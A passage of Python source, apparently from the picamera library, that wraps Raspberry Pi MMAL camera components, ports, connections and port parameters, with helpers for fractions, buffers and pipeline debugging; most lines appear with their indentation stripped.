except AttributeError:
try:
n, d = value.num, value.den
except AttributeError:
try:
# tuple
n, d = value
warnings.warn(
PiCameraDeprecated(
"Setting framerate or gains as a tuple is "
"deprecated; please use one of Python's many "
"numeric classes like int, float, Decimal, or "
"Fraction instead"))
except (TypeError, ValueError):
# try and convert anything else to a Fraction directly
value = Fraction(value)
n, d = value.numerator, value.denominator
# Ensure denominator is reasonable
if d == 0:
raise PiCameraValueError("Denominator cannot be 0")
elif d > den_limit:
return Fraction(n, d).limit_denominator(den_limit)
else:
return Fraction(n, d)
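# Illustrative conversions:
#
#     to_fraction(30)       # -> Fraction(30, 1)
#     to_fraction(0.5)      # -> Fraction(1, 2)
#     to_fraction((30, 2))  # -> Fraction(15, 1), with a deprecation warning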
def to_rational(value):
"""
Converts *value* (which can be anything accepted by :func:`to_fraction`) to
an MMAL_RATIONAL_T structure.
"""
value = to_fraction(value)
return mmal.MMAL_RATIONAL_T(value.numerator, value.denominator)
def buffer_bytes(buf):
"""
Given an object which implements the :ref:`buffer protocol
<bufferobjects>`, this function returns the size of the object in bytes.
The object can be multi-dimensional or include items larger than byte-size.
"""
if not isinstance(buf, memoryview):
buf = memoryview(buf)
return buf.itemsize * reduce(mul, buf.shape)
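# Example: a flat bytes object of length 4 occupies 4 bytes.
#
#     buffer_bytes(b'abcd')  # -> 4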
def debug_pipeline(port):
"""
Given an :class:`MMALVideoPort` *port*, this traces all objects in the
pipeline feeding it (including components and connections) and yields each
object in turn. Hence the generator typically yields something like:
* :class:`MMALVideoPort` (the specified output port)
* :class:`MMALEncoder` (the encoder which owns the output port)
* :class:`MMALVideoPort` (the encoder's input port)
* :class:`MMALConnection` (the connection between the splitter and encoder)
* :class:`MMALVideoPort` (the splitter's output port)
* :class:`MMALSplitter` (the splitter on the camera's video port)
* :class:`MMALVideoPort` (the splitter's input port)
* :class:`MMALConnection` (the connection between the splitter and camera)
* :class:`MMALVideoPort` (the camera's video port)
* :class:`MMALCamera` (the camera component)
"""
def find_port(addr):
for obj in MMALObject.REGISTRY:
if isinstance(obj, MMALControlPort):
if ct.addressof(obj._port[0]) == addr:
return obj
raise IndexError('unable to locate port with address %x' % addr)
def find_component(addr):
for obj in MMALObject.REGISTRY:
if isinstance(obj, MMALBaseComponent) and obj._component is not None:
if ct.addressof(obj._component[0]) == addr:
return obj
raise IndexError('unable to locate component with address %x' % addr)
assert isinstance(port, (MMALControlPort, MMALPythonPort))
while True:
if port.type == mmal.MMAL_PORT_TYPE_OUTPUT:
yield port
if isinstance(port, MMALPythonPort):
comp = port._owner()
else:
comp = find_component(ct.addressof(port._port[0].component[0]))
yield comp
if not isinstance(comp, (MMALComponent, MMALPythonComponent)):
break
if comp.connection is None:
break
if isinstance(comp.connection, MMALPythonConnection):
port = comp.connection._target
else:
port = find_port(ct.addressof(comp.connection._connection[0].in_[0]))
yield port
yield comp.connection
if isinstance(comp.connection, MMALPythonConnection):
port = comp.connection._source
else:
port = find_port(ct.addressof(comp.connection._connection[0].out[0]))
def print_pipeline(port):
"""
Prints a human readable representation of the pipeline feeding the
specified :class:`MMALVideoPort` *port*.
"""
rows = [[], [], [], [], [], []]
under_comp = False
for obj in reversed(list(debug_pipeline(port))):
if isinstance(obj, (MMALBaseComponent, MMALPythonBaseComponent)):
rows[0].append(obj.name)
under_comp = True
elif isinstance(obj, MMALVideoPort):
rows[0].append('[%d]' % obj._port[0].index)
if under_comp:
rows[1].append('encoding')
if obj.format == mmal.MMAL_ENCODING_OPAQUE:
rows[1].append(obj.opaque_subformat)
else:
rows[1].append(mmal.FOURCC_str(obj._port[0].format[0].encoding))
if under_comp:
rows[2].append('buf')
rows[2].append('%dx%d' % (obj._port[0].buffer_num, obj._port[0].buffer_size))
if under_comp:
rows[3].append('bitrate')
rows[3].append('%dbps' % (obj._port[0].format[0].bitrate,))
if under_comp:
rows[4].append('frame')
rows[4].append('%dx%d@%sfps' % (
obj._port[0].format[0].es[0].video.width,
obj._port[0].format[0].es[0].video.height,
obj.framerate))
if under_comp:
rows[5].append('colorspc')
under_comp = False
rows[5].append(mmal.FOURCC_str(obj._port[0].format[0].es[0].video.color_space))
elif isinstance(obj, MMALPythonPort):
rows[0].append('[%d]' % obj._index)
if under_comp:
rows[1].append('encoding')
if obj.format == mmal.MMAL_ENCODING_OPAQUE:
rows[1].append(obj.opaque_subformat)
else:
rows[1].append(mmal.FOURCC_str(obj._format[0].encoding))
if under_comp:
rows[2].append('buf')
rows[2].append('%dx%d' % (obj.buffer_count, obj.buffer_size))
if under_comp:
rows[3].append('bitrate')
rows[3].append('%dbps' % (obj._format[0].bitrate,))
if under_comp:
rows[4].append('frame')
under_comp = False
rows[4].append('%dx%d@%sfps' % (
obj._format[0].es[0].video.width,
obj._format[0].es[0].video.height,
obj.framerate))
if under_comp:
rows[5].append('colorspc')
rows[5].append('???')
elif isinstance(obj, (MMALConnection, MMALPythonConnection)):
rows[0].append('')
rows[1].append('')
rows[2].append('-->')
rows[3].append('')
rows[4].append('')
rows[5].append('')
if under_comp:
rows[1].append('encoding')
rows[2].append('buf')
rows[3].append('bitrate')
rows[4].append('frame')
rows[5].append('colorspc')
cols = list(zip(*rows))
max_lens = [max(len(s) for s in col) + 2 for col in cols]
rows = [
''.join('{0:{align}{width}s}'.format(s, align=align, width=max_len)
for s, max_len, align in zip(row, max_lens, cycle('^<^>')))
for row in rows
]
for row in rows:
print(row)
class MMALObject(object):
"""
Represents an object wrapper around an MMAL object (component, port,
connection, etc). This base class maintains a registry of all MMAL objects
currently alive (via weakrefs) which permits object lookup by name and
listing all used MMAL objects.
"""
__slots__ = ('__weakref__',)
REGISTRY = weakref.WeakSet()
def __init__(self):
super(MMALObject, self).__init__()
MMALObject.REGISTRY.add(self)
class MMALBaseComponent(MMALObject):
"""
Represents a generic MMAL component. Class attributes are read to determine
the component type, and the OPAQUE sub-formats of each connectable port.
"""
__slots__ = ('_component', '_control', '_inputs', '_outputs')
component_type = b'none'
opaque_input_subformats = ()
opaque_output_subformats = ()
def __init__(self):
super(MMALBaseComponent, self).__init__()
self._component = ct.POINTER(mmal.MMAL_COMPONENT_T)()
mmal_check(
mmal.mmal_component_create(self.component_type, self._component),
prefix="Failed to create MMAL component %s" % self.component_type)
if self._component[0].input_num != len(self.opaque_input_subformats):
raise PiCameraRuntimeError(
'Expected %d inputs but found %d on component %s' % (
len(self.opaque_input_subformats),
self._component[0].input_num,
self.component_type))
if self._component[0].output_num != len(self.opaque_output_subformats):
raise PiCameraRuntimeError(
'Expected %d outputs but found %d on component %s' % (
len(self.opaque_output_subformats),
self._component[0].output_num,
self.component_type))
self._control = MMALControlPort(self._component[0].control)
port_class = {
mmal.MMAL_ES_TYPE_UNKNOWN: MMALPort,
mmal.MMAL_ES_TYPE_CONTROL: MMALControlPort,
mmal.MMAL_ES_TYPE_VIDEO: MMALVideoPort,
mmal.MMAL_ES_TYPE_AUDIO: MMALAudioPort,
mmal.MMAL_ES_TYPE_SUBPICTURE: MMALSubPicturePort,
}
self._inputs = tuple(
port_class[self._component[0].input[n][0].format[0].type](
self._component[0].input[n], opaque_subformat)
for n, opaque_subformat in enumerate(self.opaque_input_subformats))
self._outputs = tuple(
port_class[self._component[0].output[n][0].format[0].type](
self._component[0].output[n], opaque_subformat)
for n, opaque_subformat in enumerate(self.opaque_output_subformats))
def close(self):
"""
Close the component and release all its resources. After this is
called, most methods will raise exceptions if called.
"""
if self._component is not None:
# ensure we free any pools associated with input/output ports
for output in self.outputs:
output.disable()
for input in self.inputs:
input.disable()
mmal.mmal_component_destroy(self._component)
self._component = None
self._inputs = ()
self._outputs = ()
self._control = None
@property
def name(self):
return self._component[0].name.decode('ascii')
@property
def control(self):
"""
The :class:`MMALControlPort` control port of the component which can be
used to configure most aspects of the component's behaviour.
"""
return self._control
@property
def inputs(self):
"""
A sequence of :class:`MMALPort` objects representing the inputs
of the component.
"""
return self._inputs
@property
def outputs(self):
"""
A sequence of :class:`MMALPort` objects representing the outputs
of the component.
"""
return self._outputs
@property
def enabled(self):
"""
Returns ``True`` if the component is currently enabled. Use
:meth:`enable` and :meth:`disable` to control the component's state.
"""
return bool(self._component[0].is_enabled)
def enable(self):
"""
Enable the component. When a component is enabled it will process data
sent to its input port(s), sending the results to buffers on its output
port(s). Components may be implicitly enabled by connections.
"""
mmal_check(
mmal.mmal_component_enable(self._component),
prefix="Failed to enable component")
def disable(self):
"""
Disables the component.
"""
mmal_check(
mmal.mmal_component_disable(self._component),
prefix="Failed to disable component")
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, exc_tb):
self.close()
def __repr__(self):
if self._component is not None:
return '<%s "%s": %d inputs %d outputs>' % (
self.__class__.__name__, self.name,
len(self.inputs), len(self.outputs))
else:
return '<%s closed>' % self.__class__.__name__
class MMALControlPort(MMALObject):
"""
Represents an MMAL port with properties to configure the port's parameters.
"""
__slots__ = ('_port', '_params', '_wrapper')
def __init__(self, port):
super(MMALControlPort, self).__init__()
self._port = port
self._params = MMALPortParams(port)
self._wrapper = None
@property
def index(self):
"""
Returns an integer indicating the port's position within its owning
list (inputs, outputs, etc.)
"""
return self._port[0].index
@property
def enabled(self):
"""
Returns a :class:`bool` indicating whether the port is currently
enabled. Unlike other classes, this is a read-only property. Use
:meth:`enable` and :meth:`disable` to modify the value.
"""
return bool(self._port[0].is_enabled)
def enable(self, callback=None):
"""
Enable the port with the specified callback function (this must be
``None`` for connected ports, and a callable for disconnected ports).
The callback function must accept two parameters which will be this
:class:`MMALControlPort` (or descendent) and an :class:`MMALBuffer`
instance. Any return value will be ignored.
"""
def wrapper(port, buf):
buf = MMALBuffer(buf)
try:
callback(self, buf)
finally:
buf.release()
if callback:
self._wrapper = mmal.MMAL_PORT_BH_CB_T(wrapper)
else:
self._wrapper = ct.cast(None, mmal.MMAL_PORT_BH_CB_T)
mmal_check(
mmal.mmal_port_enable(self._port, self._wrapper),
prefix="Unable to enable port %s" % self.name)
def disable(self):
"""
Disable the port.
"""
# NOTE: The test here only exists to avoid spamming the console; when
# disabling an already disabled port MMAL dumps errors to stderr. If
# this test isn't here closing a camera results in half a dozen lines
# of ignored errors
if self.enabled:
try:
mmal_check(
mmal.mmal_port_disable(self._port),
prefix="Unable to disable port %s" % self.name)
except PiCameraMMALError as e:
# Ignore the error if we're disabling an already disabled port
if not (e.status == mmal.MMAL_EINVAL and not self.enabled):
raise e
self._wrapper = None
@property
def name(self):
result = self._port[0].name.decode('ascii')
if result.endswith(')'):
try:
# strip (format) from port names as it doesn't really belong
# there (it doesn't identify the port in any way) and makes
# matching some of the correctional cases a pain
return result[:result.rindex('(')]
except ValueError:
return result
else:
return result
@property
def type(self):
"""
The type of the port. One of:
* MMAL_PORT_TYPE_OUTPUT
* MMAL_PORT_TYPE_INPUT
* MMAL_PORT_TYPE_CONTROL
* MMAL_PORT_TYPE_CLOCK
"""
return self._port[0].type
@property
def capabilities(self):
"""
The capabilities of the port. A bitfield of the following:
* MMAL_PORT_CAPABILITY_PASSTHROUGH
* MMAL_PORT_CAPABILITY_ALLOCATION
* MMAL_PORT_CAPABILITY_SUPPORTS_EVENT_FORMAT_CHANGE
"""
return self._port[0].capabilities
@property
def params(self):
"""
The configurable parameters for the port. This is presented as a
mutable mapping of parameter numbers to values, implemented by the
:class:`MMALPortParams` class.
"""
return self._params
def __repr__(self):
if self._port is not None:
return '<MMALControlPort "%s">' % self.name
else:
return '<MMALControlPort closed>'
class MMALPort(MMALControlPort):
"""
Represents an MMAL port with properties to configure and update the port's
format. This is the base class of :class:`MMALVideoPort`,
:class:`MMALAudioPort`, and :class:`MMALSubPicturePort`.
"""
__slots__ = ('_opaque_subformat', '_pool', '_stopped', '_connection')
# A mapping of corrected definitions of supported_formats for ports with
# particular names. Older firmwares either raised EINVAL, ENOSYS, or just
# reported the wrong things for various ports; these lists are derived from
# querying newer firmwares or in some cases guessing sensible defaults
# (for ports where even the newer firmwares get stuff wrong).
_supported_formats_patch = {
'vc.ril.camera:out:2': [
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_NV12,
mmal.MMAL_ENCODING_I422,
mmal.MMAL_ENCODING_YUYV,
mmal.MMAL_ENCODING_YVYU,
mmal.MMAL_ENCODING_VYUY,
mmal.MMAL_ENCODING_UYVY,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_YV12,
mmal.MMAL_ENCODING_NV21,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_RGBA,
],
'vc.ril.image_encode:in:0': [
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_I422,
mmal.MMAL_ENCODING_NV12,
mmal.MMAL_ENCODING_YUYV,
mmal.MMAL_ENCODING_YVYU,
mmal.MMAL_ENCODING_VYUY,
],
'vc.ril.image_encode:out:0': [
mmal.MMAL_ENCODING_JPEG,
mmal.MMAL_ENCODING_GIF,
mmal.MMAL_ENCODING_PNG,
mmal.MMAL_ENCODING_BMP,
mmal.MMAL_ENCODING_PPM,
mmal.MMAL_ENCODING_TGA,
],
'vc.ril.resize:in:0': [
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_I420,
# several invalid encodings (lowercase versions of the priors)
# appear here in modern firmwares but since they don't map to any
# constants they're excluded
mmal.MMAL_ENCODING_I420_SLICE,
],
'vc.ril.resize:out:0': [
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_I420,
# same invalid encodings as above here
mmal.MMAL_ENCODING_I420_SLICE,
],
'vc.ril.isp:in:0': [
mmal.MMAL_ENCODING_BAYER_SBGGR8,
mmal.MMAL_ENCODING_BAYER_SBGGR10DPCM8,
mmal.MMAL_ENCODING_BAYER_SBGGR10P,
mmal.MMAL_ENCODING_BAYER_SBGGR12P,
mmal.MMAL_ENCODING_YUYV,
mmal.MMAL_ENCODING_YVYU,
mmal.MMAL_ENCODING_VYUY,
mmal.MMAL_ENCODING_UYVY,
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_YV12,
mmal.MMAL_ENCODING_I422,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_YUVUV128,
mmal.MMAL_ENCODING_NV12,
mmal.MMAL_ENCODING_NV21,
],
'vc.ril.isp:out:0': [
mmal.MMAL_ENCODING_YUYV,
mmal.MMAL_ENCODING_YVYU,
mmal.MMAL_ENCODING_VYUY,
mmal.MMAL_ENCODING_UYVY,
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_YV12,
mmal.MMAL_ENCODING_I422,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_YUVUV128,
mmal.MMAL_ENCODING_NV12,
mmal.MMAL_ENCODING_NV21,
],
'vc.null_sink:in:0': [
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
],
}
def __init__(self, port, opaque_subformat='OPQV'):
super(MMALPort, self).__init__(port)
self.opaque_subformat = opaque_subformat
self._pool = None
self._stopped = True
self._connection = None
def __repr__(self):
if self._port is not None:
return '<MMALPort "%s": format=MMAL_FOURCC(%r) buffers=%dx%d>' % (
self.name, mmal.FOURCC_str(self.format),
self.buffer_count, self.buffer_size)
else:
return '<MMALPort closed>'
def _get_opaque_subformat(self):
return self._opaque_subformat
def _set_opaque_subformat(self, value):
self._opaque_subformat = value
opaque_subformat = property(
_get_opaque_subformat, _set_opaque_subformat, doc="""\
Retrieves or sets the opaque sub-format that the port speaks. While
most formats (I420, RGBA, etc.) mean one thing, the opaque format is
special; different ports produce different sorts of data when
configured for OPQV format. This property stores a string which
uniquely identifies what the associated port means for OPQV format.
If the port does not support opaque format at all, set this property to
``None``.
:class:`MMALConnection` uses this information when negotiating formats
for a connection between two ports.
""")
def _get_format(self):
result = self._port[0].format[0].encoding
if FIX_RGB_BGR_ORDER:
return {
mmal.MMAL_ENCODING_RGB24: mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_BGR24: mmal.MMAL_ENCODING_RGB24,
}.get(result, result)
else:
return result
def _set_format(self, value):
if FIX_RGB_BGR_ORDER:
value = {
mmal.MMAL_ENCODING_RGB24: mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_BGR24: mmal.MMAL_ENCODING_RGB24,
}.get(value, value)
self._port[0].format[0].encoding = value
if value == mmal.MMAL_ENCODING_OPAQUE:
self._port[0].format[0].encoding_variant = mmal.MMAL_ENCODING_I420
format = property(_get_format, _set_format, doc="""\
Retrieves or sets the encoding format of the port. Setting this
attribute implicitly sets the encoding variant to a sensible value
(I420 in the case of OPAQUE).
After setting this attribute, call :meth:`commit` to make the changes
effective.
""")
@property
def supported_formats(self):
"""
Retrieves a sequence of supported encodings on this port.
"""
try:
mp = self.params[mmal.MMAL_PARAMETER_SUPPORTED_ENCODINGS]
except PiCameraMMALError as e:
if e.status in (mmal.MMAL_EINVAL, mmal.MMAL_ENOSYS):
# Workaround: old firmwares raise EINVAL or ENOSYS when various
# ports are queried for supported formats. The following is the
# correct sequence for old firmwares (note: swapped RGB24 and
# BGR24 order in still port) ... probably (vc.ril.camera:out:2
# is definitely right, the rest are largely guessed based on
# queries of later firmwares)
try:
return MMALPort._supported_formats_patch[self.name]
except KeyError:
raise e
else:
raise
else:
result = [
v for v in mp.encoding if v != 0
][:mp.hdr.size // ct.sizeof(ct.c_uint32)]
# Workaround: Fix incorrect result on MMALImageEncoder.outputs[0]
# from modern firmwares
if self.name == 'vc.ril.image_encode:out:0' and result == [
mmal.MMAL_ENCODING_MP2V, mmal.MMAL_ENCODING_MP2V,
mmal.MMAL_ENCODING_H264, mmal.MMAL_ENCODING_H264,
mmal.MMAL_ENCODING_VP7, mmal.MMAL_ENCODING_VP7,
mmal.MMAL_ENCODING_VP6, mmal.MMAL_ENCODING_VP6]:
return MMALPort._supported_formats_patch[self.name]
else:
return result
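    # Example (sketch): guarding a format assignment with supported_formats
    # before committing (`port` is a hypothetical MMALVideoPort):
    #
    #     if mmal.MMAL_ENCODING_RGB24 in port.supported_formats:
    #         port.format = mmal.MMAL_ENCODING_RGB24
    #         port.commit()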
def _get_bitrate(self):
return self._port[0].format[0].bitrate
def _set_bitrate(self, value):
self._port[0].format[0].bitrate = value
bitrate = property(_get_bitrate, _set_bitrate, doc="""\
Retrieves or sets the bitrate limit for the port's format.
""")
def copy_from(self, source):
"""
Copies the port's :attr:`format` from the *source*
:class:`MMALControlPort`.
"""
if isinstance(source, MMALPythonPort):
mmal.mmal_format_copy(self._port[0].format, source._format)
else:
mmal.mmal_format_copy(self._port[0].format, source._port[0].format)
def commit(self):
"""
Commits the port's configuration and automatically updates the number
and size of associated buffers according to the recommendations of the
MMAL library. This is typically called after adjusting the port's
format and/or associated settings (like width and height for video
ports).
"""
mmal_check(
mmal.mmal_port_format_commit(self._port),
prefix="Format couldn't be set on port %s" % self.name)
# Workaround: Unfortunately, there is an upstream issue with the
# buffer_num_recommended which means it can't currently be used (see
# discussion in raspberrypi/userland#167). There's another upstream
# issue with buffer_num_min which means we need to guard against 0
# values...
self._port[0].buffer_num = max(1, self._port[0].buffer_num_min)
self._port[0].buffer_size = (
self._port[0].buffer_size_recommended
if self._port[0].buffer_size_recommended > 0 else
self._port[0].buffer_size_min)
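    # Example (sketch): the usual configure-then-commit sequence on a video
    # port; commit() refreshes buffer_count and buffer_size afterwards
    # (`port` is a hypothetical MMALVideoPort):
    #
    #     port.format = mmal.MMAL_ENCODING_I420
    #     port.framesize = (1280, 720)
    #     port.framerate = 30
    #     port.commit()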
@property
def pool(self):
"""
        Returns the :class:`MMALPool` associated with the port, if any.
"""
return self._pool
def get_buffer(self, block=True, timeout=None):
"""
Returns a :class:`MMALBuffer` from the associated :attr:`pool`. *block*
and *timeout* act as they do in the corresponding
:meth:`MMALPool.get_buffer`.
"""
if not self.enabled:
raise PiCameraPortDisabled(
'cannot get buffer from disabled port %s' % self.name)
return self.pool.get_buffer(block, timeout)
def send_buffer(self, buf):
"""
Send :class:`MMALBuffer` *buf* to the port.
"""
if (
self.type == mmal.MMAL_PORT_TYPE_INPUT and
isinstance(self._connection, MMALPythonConnection) and
self._connection._callback is not None):
try:
modified_buf = self._connection._callback(self._connection, buf)
except:
buf.release()
raise
else:
if modified_buf is None:
buf.release()
return
else:
buf = modified_buf
try:
mmal_check(
mmal.mmal_port_send_buffer(self._port, buf._buf),
prefix="cannot send buffer to port %s" % self.name)
except PiCameraMMALError as e:
# If port is disabled, convert exception for convenience
if e.status == mmal.MMAL_EINVAL and not self.enabled:
raise PiCameraPortDisabled(
'cannot send buffer to disabled port %s' % self.name)
else:
raise
def flush(self):
"""
Flush the port.
"""
mmal_check(
mmal.mmal_port_flush(self._port),
prefix="Unable to flush port %s" % self.name)
def _get_buffer_count(self):
return self._port[0].buffer_num
def _set_buffer_count(self, value):
if value < 1:
raise PiCameraMMALError(mmal.MMAL_EINVAL, 'buffer count <1')
self._port[0].buffer_num = value
buffer_count = property(_get_buffer_count, _set_buffer_count, doc="""\
The number of buffers allocated (or to be allocated) to the port.
The ``mmalobj`` layer automatically configures this based on
recommendations from the MMAL library.
""")
def _get_buffer_size(self):
return self._port[0].buffer_size
def _set_buffer_size(self, value):
if value < 0:
raise PiCameraMMALError(mmal.MMAL_EINVAL, 'buffer size <0')
self._port[0].buffer_size = value
buffer_size = property(_get_buffer_size, _set_buffer_size, doc="""\
The size of buffers allocated (or to be allocated) to the port. The
size of buffers is typically dictated by the port's format. The
``mmalobj`` layer automatically configures this based on
recommendations from the MMAL library.
""")
def enable(self, callback=None):
"""
Enable the port with the specified callback function (this must be
``None`` for connected ports, and a callable for disconnected ports).
The callback function must accept two parameters which will be this
:class:`MMALControlPort` (or descendent) and an :class:`MMALBuffer`
instance. The callback should return ``True`` when processing is
complete and no further calls are expected (e.g. at frame-end for an
image encoder), and ``False`` otherwise.
"""
def wrapper(port, buf):
buf = MMALBuffer(buf)
try:
if not self._stopped and callback(self, buf):
self._stopped = True
finally:
buf.release()
try:
self._pool.send_buffer(block=False)
except PiCameraPortDisabled:
# The port was disabled, no point trying again
pass
# Workaround: There is a bug in the MJPEG encoder that causes a
# deadlock if the FIFO is full on shutdown. Increasing the encoder
# buffer size makes this less likely to happen. See
# raspberrypi/userland#208. Connecting the encoder component resets the
        # output port's buffer size, hence we correct it here, just
# before enabling the port.
if self._port[0].format[0].encoding == mmal.MMAL_ENCODING_MJPEG:
self._port[0].buffer_size = max(512 * 1024, self._port[0].buffer_size_recommended)
if callback:
assert self._stopped
assert self._pool is None
self._stopped = False
self._pool = MMALPortPool(self)
try:
self._wrapper = mmal.MMAL_PORT_BH_CB_T(wrapper)
mmal_check(
mmal.mmal_port_enable(self._port, self._wrapper),
prefix="Unable to enable port %s" % self.name)
# If this port is an output port, send it all the buffers
# in the pool. If it's an input port, don't bother: the user
# will presumably want to feed buffers to it manually
if self._port[0].type == mmal.MMAL_PORT_TYPE_OUTPUT:
self._pool.send_all_buffers(block=False)
except:
self._pool.close()
self._pool = None
self._stopped = True
raise
else:
super(MMALPort, self).enable()
def disable(self):
"""
Disable the port.
"""
self._stopped = True
super(MMALPort, self).disable()
if self._pool is not None:
self._pool.close()
self._pool = None
@property
def connection(self):
"""
If this port is connected to another, this property holds the
:class:`MMALConnection` or :class:`MMALPythonConnection` object which
represents that connection. If this port is not connected, this
property is ``None``.
"""
return self._connection
def connect(self, other, **options):
"""
Connect this port to the *other* :class:`MMALPort` (or
:class:`MMALPythonPort`). The type and configuration of the connection
will be automatically selected.
Various connection *options* can be specified as keyword arguments.
These will be passed onto the :class:`MMALConnection` or
:class:`MMALPythonConnection` constructor that is called (see those
classes for an explanation of the available options).
"""
# Always construct connections from the output end
if self.type != mmal.MMAL_PORT_TYPE_OUTPUT:
return other.connect(self, **options)
if other.type != mmal.MMAL_PORT_TYPE_INPUT:
raise PiCameraValueError(
'A connection can only be established between an output and '
'an input port')
if isinstance(other, MMALPythonPort):
return MMALPythonConnection(self, other, **options)
else:
return MMALConnection(self, other, **options)
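    # Example (sketch): connecting a camera video port to an encoder input;
    # connect() may be called from either end and returns the connection
    # (`camera` and `encoder` are hypothetical components):
    #
    #     conn = camera.outputs[1].connect(encoder.inputs[0])
    #     conn.enable()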
def disconnect(self):
"""
Destroy the connection between this port and another port.
"""
if self.connection is not None:
self.connection.close()
class MMALVideoPort(MMALPort):
"""
Represents an MMAL port used to pass video data.
"""
__slots__ = ()
def __repr__(self):
if self._port is not None:
return (
'<MMALVideoPort "%s": format=MMAL_FOURCC("%s") buffers=%dx%d '
'frames=%s@%sfps colorspace=MMAL_FOURCC("%s")>' % (
self.name, mmal.FOURCC_str(self.format),
self._port[0].buffer_num, self._port[0].buffer_size,
self.framesize, self.framerate,
mmal.FOURCC_str(self.colorspace)))
else:
return '<MMALVideoPort closed>'
def _get_framesize(self):
return PiResolution(
self._port[0].format[0].es[0].video.crop.width,
self._port[0].format[0].es[0].video.crop.height,
)
def _set_framesize(self, value):
value = to_resolution(value)
video = self._port[0].format[0].es[0].video
video.width = bcm_host.VCOS_ALIGN_UP(value.width, 32)
video.height = bcm_host.VCOS_ALIGN_UP(value.height, 16)
video.crop.width = value.width
video.crop.height = value.height
framesize = property(_get_framesize, _set_framesize, doc="""\
Retrieves or sets the size of the port's video frames as a (width,
height) tuple. This attribute implicitly handles scaling the given
size up to the block size of the camera (32x16).
After setting this attribute, call :meth:`~MMALPort.commit` to make the
changes effective.
""")
def _get_framerate(self):
video = self._port[0].format[0].es[0].video
try:
return Fraction(
video.frame_rate.num,
video.frame_rate.den)
except ZeroDivisionError:
assert video.frame_rate.num == 0
return Fraction(0, 1)
def _set_framerate(self, value):
value = to_fraction(value)
video = self._port[0].format[0].es[0].video
video.frame_rate.num = value.numerator
video.frame_rate.den = value.denominator
framerate = property(_get_framerate, _set_framerate, doc="""\
Retrieves or sets the framerate of the port's video frames in fps.
After setting this attribute, call :meth:`~MMALPort.commit` to make the
changes effective.
""")
def _get_colorspace(self):
return self._port[0].format[0].es[0].video.color_space
def _set_colorspace(self, value):
self._port[0].format[0].es[0].video.color_space = value
colorspace = property(_get_colorspace, _set_colorspace, doc="""\
Retrieves or sets the color-space of the port's frames.
After setting this attribute, call :meth:`~MMALPort.commit` to make the
changes effective.
""")
class MMALAudioPort(MMALPort):
"""
Represents an MMAL port used to pass audio data.
"""
__slots__ = ()
def __repr__(self):
if self._port is not None:
return '<MMALAudioPort "%s": format=MMAL_FOURCC(%r) buffers=%dx%d>' % (
self.name, mmal.FOURCC_str(self.format),
self._port[0].buffer_num, self._port[0].buffer_size)
else:
return '<MMALAudioPort closed>'
class MMALSubPicturePort(MMALPort):
"""
Represents an MMAL port used to pass sub-picture (caption) data.
"""
__slots__ = ()
def __repr__(self):
if self._port is not None:
return '<MMALSubPicturePort "%s": format=MMAL_FOURCC(%r) buffers=%dx%d>' % (
self.name, mmal.FOURCC_str(self.format),
self._port[0].buffer_num, self._port[0].buffer_size)
else:
return '<MMALSubPicturePort closed>'
class MMALPortParams(object):
"""
Represents the parameters of an MMAL port. This class implements the
:attr:`MMALControlPort.params` attribute.
Internally, the class understands how to convert certain structures to more
common Python data-types. For example, parameters that expect an
MMAL_RATIONAL_T type will return and accept Python's
:class:`~fractions.Fraction` class (or any other numeric types), while
parameters that expect an MMAL_BOOL_T type will treat anything as a truthy
value. Parameters that expect the MMAL_PARAMETER_STRING_T structure will be
treated as plain strings, and likewise MMAL_PARAMETER_INT32_T and similar
structures will be treated as plain ints.
Parameters that expect more complex structures will return and expect
those structures verbatim.
"""
__slots__ = ('_port',)
def __init__(self, port):
super(MMALPortParams, self).__init__()
self._port = port
def __getitem__(self, key):
dtype = PARAM_TYPES[key]
# Use the short-cut functions where possible (teeny bit faster if we
# get some C to do the structure wrapping for us)
func = {
mmal.MMAL_PARAMETER_RATIONAL_T: mmal.mmal_port_parameter_get_rational,
mmal.MMAL_PARAMETER_BOOLEAN_T: mmal.mmal_port_parameter_get_boolean,
mmal.MMAL_PARAMETER_INT32_T: mmal.mmal_port_parameter_get_int32,
mmal.MMAL_PARAMETER_INT64_T: mmal.mmal_port_parameter_get_int64,
mmal.MMAL_PARAMETER_UINT32_T: mmal.mmal_port_parameter_get_uint32,
mmal.MMAL_PARAMETER_UINT64_T: mmal.mmal_port_parameter_get_uint64,
}.get(dtype, mmal.mmal_port_parameter_get)
conv = {
mmal.MMAL_PARAMETER_RATIONAL_T: lambda v: Fraction(v.num, v.den),
mmal.MMAL_PARAMETER_BOOLEAN_T: lambda v: v.value != mmal.MMAL_FALSE,
mmal.MMAL_PARAMETER_INT32_T: lambda v: v.value,
mmal.MMAL_PARAMETER_INT64_T: lambda v: v.value,
mmal.MMAL_PARAMETER_UINT32_T: lambda v: v.value,
mmal.MMAL_PARAMETER_UINT64_T: lambda v: v.value,
mmal.MMAL_PARAMETER_STRING_T: lambda v: v.str.decode('ascii'),
